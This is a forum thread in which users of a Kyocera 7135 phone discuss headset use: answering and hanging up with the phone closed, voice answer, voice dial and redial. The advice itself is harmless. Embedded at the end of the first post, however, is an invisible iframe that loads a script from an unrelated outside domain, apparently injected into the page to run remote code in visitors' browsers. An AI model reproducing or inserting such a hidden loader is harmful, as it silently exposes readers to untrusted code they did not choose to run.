+ Reply to Thread
Results 1 to 11 of 11
  1. #1
    Registered User
    Join Date
    02-22-2003
    Posts
    13

    Headset Usage questions

    Sorry if this has been covered, but I searched and couldn't find the answers to my questions.

    I currently use a MOT V60I about 2500+ minutes per month. I use both a Jabra Blue tooth headset (with dongle) as well as a traditional wired headset. My questions concern using the wired headset.

    With the 7135, without setting the phone to "autoanswer" after a couple of rings, can I:

    A) Answer the phone without opening it? IE some type of smart button on the outside?

    B) Can I hang up from a call without opening the phone?

    C) Can I start a voice activated phone call without opening the phone?

    Any tips or cool tricks you current 7135 users have concerning headsets?

    Thanks
    Dave<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184

    Re: Headset Usage questions

    Originally posted by dpointer
    Sorry if this has been covered, but I searched and couldn't find the answers to my questions.

    I currently use a MOT V60I about 2500+ minutes per month. I use both a Jabra Blue tooth headset (with dongle) as well as a traditional wired headset. My questions concern using the wired headset.

    With the 7135, without setting the phone to "autoanswer" after a couple of rings, can I:

    A) Answer the phone without opening it? IE some type of smart button on the outside?

    B) Can I hang up from a call without opening the phone?

    C) Can I start a voice activated phone call without opening the phone?

    Any tips or cool tricks you current 7135 users have concerning headsets?

    Thanks
    Dave
    For a wired headset:

    A) If you have voice answer enabled, when a headset is plugged in, it will ask if you want to answer. Say yes. Otherwise, you will need a wired headset with an answer/end button. There is no answer button on the outside of the phone (note: The Jabra can be set to answer/end emulation).

    B) Only with a headset that has an answer/end button.

    C) If your headset has an Answer/End button, then you can hit the button and it will start a voice dial session. Otherwise, only with external power and a headset (or the handsfree kit). If running on batter power, you need to open it and hit the green phone button, but then you can voice dial.

    Alan

  3. #3
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    The 7135 is designed to be answered while closed one of three ways:
    1. Using the Kyocera headset with the one touch button. This allows you to start, answer, and terminate calls with the press of one button.
    2. Enable "Voice Answer" on the 7135. With this, you will be given audible prompts when there are incoming calls. It will ask you "Incoming Call, would you like to answer?". Speaking Yes or No will handle that event. On a side note, if you have a voice dial linked to that number, the message will say "Incoming call from "enter voice dial recording", would you like to answer?". Pretty neat
    3. Auto answer

  4. #4
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by HoTSynC
    The 7135 is designed to be answered while closed one of three ways:
    1. Using the Kyocera headset with the one touch button. This allows you to start, answer, and terminate calls with the press of one button.
    2. Enable "Voice Answer" on the 7135. With this, you will be given audible prompts when there are incoming calls. It will ask you "Incoming Call, would you like to answer?". Speaking Yes or No will handle that event. On a side note, if you have a voice dial linked to that number, the message will say "Incoming call from "enter voice dial recording", would you like to answer?". Pretty neat
    3. Auto answer
    I didn't know about the voice dial link. I am going to add a bunch of voice dials now, not for people I call, but for people who call me! cool!

    Alan

  5. #5
    Registered User
    Join Date
    08-05-2003
    Posts
    8

    Re: Re: Headset Usage questions

    B) Can I hang up from a call without opening the phone?
    Originally posted by alanb
    B) Only with a headset that has an answer/end button.
    Actually, I have found that if I pull the headset plug out of the socket, it hangs up a call. Kind of a hack, but it does keep me from having to open the phone.

  6. #6
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Originally posted by alanb
    I didn't know about the voice dial link. I am going to add a bunch of voice dials now, not for people I call, but for people who call me! cool!

    Alan
    Let m eknow how that works for you. I haven't done it yet, but that has been the default operation of the voice dial enabled handsets from Kyocera lately.

  7. #7
    (XXX) XXX-XXXX aka.bugle's Avatar
    Join Date
    01-22-2002
    Posts
    109
    If you press the mic button while not on a call you will hear a beep then you can say a name.
    If you press the mic button during a call it will disconnect you.
    <bugle>

  8. #8
    Registered User
    Join Date
    08-28-2003
    Location
    NYC
    Posts
    259
    Know what would be nice? A "redial" voice command. I don't see any way to do that now, is there?

  9. #9
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    hmmm, no, but if you press send twice, or the one touch button on the headset twice, it will do it.

  10. #10
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by HoTSynC
    Let m eknow how that works for you. I haven't done it yet, but that has been the default operation of the voice dial enabled handsets from Kyocera lately.
    Just tried it. doesn't work. The display does show that it recognizes it as the correct entry from the address book, but the voice just says "incoming call, answer?" not "incoming call from name, answer?"

    Alan

  11. #11
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Well crap. I guess that is only availble on the non-Palm voice enabled units (2235 does it).

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts